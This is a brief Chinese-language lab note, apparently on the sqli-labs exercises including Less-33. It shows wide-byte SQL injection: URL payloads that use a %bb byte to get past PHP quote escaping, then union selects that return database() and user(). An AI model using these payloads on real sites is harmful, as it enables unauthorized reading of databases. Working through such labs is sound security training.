0x01 判断注入点
宽字节注入,过滤掉'(使用php函数将'转义)
输入',"都显示正常
判断宽字节注入
?id=1%bb%27
或者
?id=1%bb%5c%5c%27--+
0x02判断数据库名
后面就正常注入
?id=-1%bb%5c%5c%27 union select 1,database(),user()--+
0x03 Less-33
33关同样的方法绕过
?id=1%bb%27--+
?id=0%bb%5c%5c%27 union select 1,database(),user()--+
